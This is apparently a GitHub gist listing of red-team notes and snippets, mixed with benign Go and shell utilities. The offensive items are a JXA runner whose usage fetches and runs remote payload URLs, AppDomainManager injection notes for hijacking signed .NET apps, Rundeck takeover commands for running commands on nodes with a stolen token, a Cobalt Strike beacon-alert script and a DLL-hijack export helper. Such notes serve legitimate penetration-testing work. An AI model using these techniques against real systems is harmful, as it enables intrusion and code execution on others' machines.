@thesubtlety
thesubtlety / getgo.sh
Created January 5, 2023 20:15
Install go to home dir on debian
#!/bin/bash
# Install golang to home dir
GOPATH="$HOME/go"
GOUTIL="$HOME/.go"
# The VERSION endpoint may return more than one line (version, then a "time ..." line); keep only the version
LATEST="$(curl -s https://go.dev/VERSION?m=text | head -n1)"
DL_PKG="$LATEST.linux-amd64.tar.gz"
DL_URL="https://go.dev/dl/$DL_PKG"
wget "$DL_URL" -P "$GOUTIL"
# Replace any previous install under $HOME/go with the freshly downloaded tarball
rm -rf "$GOPATH" && tar -C "$HOME" -xzf "$GOUTIL/$DL_PKG"
# Only affects this script's shell; add the same line to your shell profile to make it persistent
export PATH="$PATH:$HOME/go/bin"
@thesubtlety
thesubtlety / template.sh
Created November 18, 2022 23:43
shell script template
#!/usr/bin/env bash
# https://sharats.me/posts/shell-script-best-practices/
set -o errexit
set -o nounset
set -o pipefail
if [[ "${TRACE-0}" == "1" ]]; then
set -o xtrace
fi
@thesubtlety
thesubtlety / jxarun.swift
Last active October 7, 2022 20:47
Run jxa from file http stdin
// adapted from cedowns jxa-runner
import Foundation
import Cocoa
import OSAKit
//Usage:
// for hosted .js JXA payloads: ./JXARunner -u [url_to_jxa_payload]
// for local .js JXA payloads: ./JXARunner -f [path_to_jxa_payload]
// echo 'jxacode' | ./runner -s
@thesubtlety
thesubtlety / jxarunner.m
Created September 30, 2022 18:15
Obj JXA runner
#import <Foundation/Foundation.h>
#import <Appkit/AppKit.h>
#import <CoreFoundation/CoreFoundation.h>
#import <OSAKit/OSAKit.h>
#import <Cocoa/Cocoa.h>
#import <OSAKit/OSALanguage.h>
#import <Foundation/NSString.h>
#include <string.h>
//jxarunner file.js
@thesubtlety
thesubtlety / _notes.md
Created April 25, 2022 14:53 — forked from djhohnstein/_notes.md
AppDomainManager Injection

Let's turn any .NET application into an LOLBin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed; they do this by matching Original Filename to Process Name.

In this example, we don't have to rename anything. We simply coerce a trusted signed app to load our assembly.

We do this by directing the application to read a config file we provide.

@thesubtlety
thesubtlety / rundeck-commands.md
Created October 14, 2021 15:06
Rundeck Takeover Reference

Rundeck Compromise

Reference notes to run commands on nodes controlled by Rundeck given a valid API token.

RUNDECK="https://host"
TOKEN="x-rundeck-auth-token:<secret>"

# Identify projects (API v16; the token is sent as the X-Rundeck-Auth-Token header)
curl -H "$TOKEN" "$RUNDECK/api/16/projects/" -H "accept:application/json" | jq .
@thesubtlety
thesubtlety / stalebacon.cna
Created March 26, 2021 21:59
Stale beacon slacker, only messages once
# CNA script to alert on dead beacons. Doesn't repeat messages.
# author: noah @thesubtlety
# credit https://github.com/bluscreenofjeff/AggressorScripts/blob/master/stale-beacon-notifier.cna - bluescreenofjeff
$webhook_url = "https://hooks.slack.com/services/xxxxx";
$slack_channel = "#crackers";
%beacon_status = %();
# default stale value of 5 minutes (300000ms)
$stale_value = 300000;
@thesubtlety
thesubtlety / natlas-docker-howto.md
Last active August 13, 2020 23:15
tl;dr natlas/docker install
@thesubtlety
thesubtlety / Get-Exports.ps1
Created February 12, 2020 17:59
DLL Hijack with exports
function Get-Exports {
<#
.SYNOPSIS
Get-Exports fetches DLL exports and optionally provides
C++ wrapper output (identical to ExportsToC++ but without
needing VS and a compiled binary). To do this it reads DLL
bytes into memory and then parses them (no LoadLibraryEx).
Because of this you can parse x32/x64 DLLs regardless of
the bitness of PowerShell.
@thesubtlety
thesubtlety / golang-windows-dll.go
Created February 5, 2020 05:18
Calling Windows DLLs from Go
package main
import (
"fmt"
"syscall"
"unicode/utf16"
"unsafe"
)
//https://github.com/golang/go/wiki/WindowsDLLs